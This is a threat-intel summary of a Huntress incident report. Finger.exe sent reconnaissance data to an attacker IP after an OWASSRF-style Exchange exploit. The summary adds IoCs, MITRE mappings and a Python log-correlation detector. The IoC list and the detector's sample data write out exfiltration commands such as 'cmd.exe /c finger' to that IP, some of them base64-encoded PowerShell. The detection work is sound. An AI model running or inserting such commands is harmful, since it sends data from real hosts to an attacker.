Threat Intel Accelerates Detection and Response | Huntress

Huntress identified novel indicators of an attack in which finger.exe exfiltrated reconnaissance data from an endpoint, linked to a persistent IP address and to web server and event log artifacts. The findings illustrate rapid detection and response when threat intel, Windows Defender events, and server logs are correlated, and they connect to the previously reported OWASSRF exploit pattern described by Unit42. #finger.exe #OWASSRF #Unit42 #Huntress #MSExchange

Keypoints

  • Huntress detected an operation using finger.exe to exfiltrate reconnaissance data from an endpoint (Nov 2023).
  • The activity involved four command lines, three of which were base64-encoded PowerShell commands and one a non-encoded command; Windows Defender remediated all four.
  • The decoded first command was “finger [email protected]”, followed by further obfuscated PowerShell activity and a final “C:\Windows\System32\cmd.exe /c finger [email protected]” command.
  • Indicators were traced through Windows Defender events, MSExchange CmdletLogs, and web server logs, forming an artifact constellation that matched OWASSRF-related activity.
  • Artifacts included a POST to /owa/[email protected]/powershell, the 185.56.83.82 IP, and specific User-Agent strings in web logs.
  • The incident concluded with remediation actions and a recommendation to update MSExchange, demonstrating rapid, intel-led detection and response.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The actor exploited the public-facing Exchange server by sending POST requests to the /owa/[email protected]/powershell page. Quote: ‘POST requests with status code of 200, to the /owa/[email protected]/powershell page’
  • [T1059.001] PowerShell – Several commands were executed as base64-encoded PowerShell scripts, including an encoded PowerShell sequence leading to further commands. Quote: ‘three of which were base64-encoded PowerShell commands’
  • [T1059.003] Windows Command Shell – The final executed command used cmd.exe: ‘C:\Windows\System32\cmd.exe /c finger [email protected]’
  • [T1078] Valid Accounts – The threat actor reportedly had to authenticate to the server prior to exploitation, per Unit42’s threat brief. Quote: ‘the threat actor had to first authenticate to the server prior to exploitation’

Indicators of Compromise

  • [IP Address] 185.56.83.82 – Source IP address for POST requests to the web server, and destination IP address for finger.exe commands
  • [File path] C:\Windows\System32\winevt\Logs\MSExchange Management.evtx – Event Log file containing strings like “System.Diagnostics”, “w3wp#MSExchangePowerShellAppPool”, and “ProcessStartInfo Arguments”
  • [File path] C:\inetpub\Logs\LogFiles\W3SVC1\u_ex240112.log – Web server log file with POST requests to /owa/[email protected]/powershell and the related User-Agent
  • [URL] /owa/[email protected]/powershell – Web path used to trigger PowerShell activity
  • [User-Agent] Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36 – User-Agent observed in web server logs
  • [File name] finger.exe – The executable used in the malicious sequence
  • [Command] finger [email protected] – Final command observed in the sequence
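
The correlation the Keypoints describe (web-log artifact joined to the endpoint artifact on the remote IP) can be reproduced offline with a small detector. The example below is added here and is not Huntress code: it parses IIS W3C log lines, selects successful POSTs to /owa/<mailbox>/powershell, decodes PowerShell -EncodedCommand arguments (UTF-16LE base64), extracts the host that finger.exe was pointed at, and reports which IPs appear on both sides. The log lines, the mailbox name in the URL path, and the user name in the finger command are constructed sample data; only the IP, path pattern and User-Agent come from the indicator list above.

```python
import base64
import re

# Indicators taken from the page (IP, path pattern, User-Agent).
IOC_IP = "185.56.83.82"
OWA_POWERSHELL_PATH = re.compile(r"^/owa/[^/]+/powershell/?$", re.IGNORECASE)
IOC_USER_AGENT = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36")

# Constructed IIS W3C log excerpt (not from the incident). IIS writes spaces inside a
# field as '+', so the User-Agent appears with '+' between words. The mailbox in the
# path and the second client IP are placeholders.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-01-12 03:14:07 10.0.0.5 POST /owa/mailbox@example.invalid/powershell - 443 - 185.56.83.82 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.54+Safari/537.36 - 200 0 0 312
2024-01-12 03:14:09 10.0.0.5 GET /owa/ - 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 200 0 0 45
2024-01-12 03:14:11 10.0.0.5 POST /owa/mailbox@example.invalid/powershell - 443 - 185.56.83.82 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.54+Safari/537.36 - 401 0 0 18
"""


def parse_iis_log(text):
    """Parse IIS W3C extended log text into dicts keyed by the names in the #Fields line."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()
            if len(values) != len(fields):
                continue  # malformed line: skip rather than misalign the columns
            rec = dict(zip(fields, values))
            if "cs(User-Agent)" in rec:  # undo the '+' substitution so the IoC string matches
                rec["cs(User-Agent)"] = rec["cs(User-Agent)"].replace("+", " ")
            records.append(rec)
    return records


def find_owa_powershell_posts(records):
    """Successful POSTs to /owa/<mailbox>/powershell, the web-side artifact on the page."""
    return [r for r in records
            if r.get("cs-method") == "POST"
            and OWA_POWERSHELL_PATH.match(r.get("cs-uri-stem", ""))
            and r.get("sc-status") == "200"]


# Any unambiguous prefix of -EncodedCommand (-e, -enc, -encoded, ...) followed by a base64 blob.
ENC_FLAG = re.compile(r"(?:^|\s)-([A-Za-z]+)\s+([A-Za-z0-9+/=]{8,})")


def decode_encoded_powershell(cmdline):
    """Return the plaintext of a powershell -EncodedCommand argument (UTF-16LE base64), or None."""
    for flag, blob in ENC_FLAG.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


# finger [-options] [user]@host  ->  capture host (the exfiltration destination)
FINGER_RE = re.compile(r"(?i)\bfinger(?:\.exe)?\s+(?:-\S+\s+)*(?:[^\s@]*@)?([0-9A-Za-z.\-]+)")


def extract_finger_hosts(command):
    """Hosts that a finger command in `command` would connect to."""
    return [m.group(1) for m in FINGER_RE.finditer(command)]


def correlate(log_text, command_lines):
    """Join the web-log artifact with the endpoint artifact on the remote IP address."""
    web_hits = find_owa_powershell_posts(parse_iis_log(log_text))
    decoded, finger_hosts = [], set()
    for cmd in command_lines:
        plain = decode_encoded_powershell(cmd) or cmd
        decoded.append(plain)
        finger_hosts.update(extract_finger_hosts(plain))
    web_ips = {r["c-ip"] for r in web_hits}
    return {
        "web_hits": web_hits,
        "decoded_commands": decoded,
        "finger_hosts": sorted(finger_hosts),
        "shared_ips": sorted(web_ips & finger_hosts),
        "ioc_ip_seen": IOC_IP in web_ips or IOC_IP in finger_hosts,
        "ioc_ua_seen": any(r.get("cs(User-Agent)") == IOC_USER_AGENT for r in web_hits),
    }


def _encode_ps(command):
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed endpoint command lines in the shape the Keypoints describe (encoded PowerShell
# followed by a plain cmd.exe invocation); "user" is a placeholder, not the incident's value.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -enc " + _encode_ps("finger user@185.56.83.82"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Temp\\maint.ps1",
    "C:\\Windows\\System32\\cmd.exe /c finger user@185.56.83.82",
]

if __name__ == "__main__":
    result = correlate(SAMPLE_IIS_LOG, SAMPLE_COMMAND_LINES)
    for key in ("decoded_commands", "finger_hosts", "shared_ips", "ioc_ip_seen", "ioc_ua_seen"):
        print(f"{key}: {result[key]}")
```

Matching on the path pattern rather than the exact mailbox string is deliberate: the mailbox part of the OWASSRF path varies per target, while the `/owa/<mailbox>/powershell` shape and the 200 status are the stable part of the artifact. The same applies on the endpoint side, where the encoded PowerShell must be decoded before any string match for `finger` can succeed.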

Read more: https://www.huntress.com/blog/threat-intel-accelerates-detection-and-response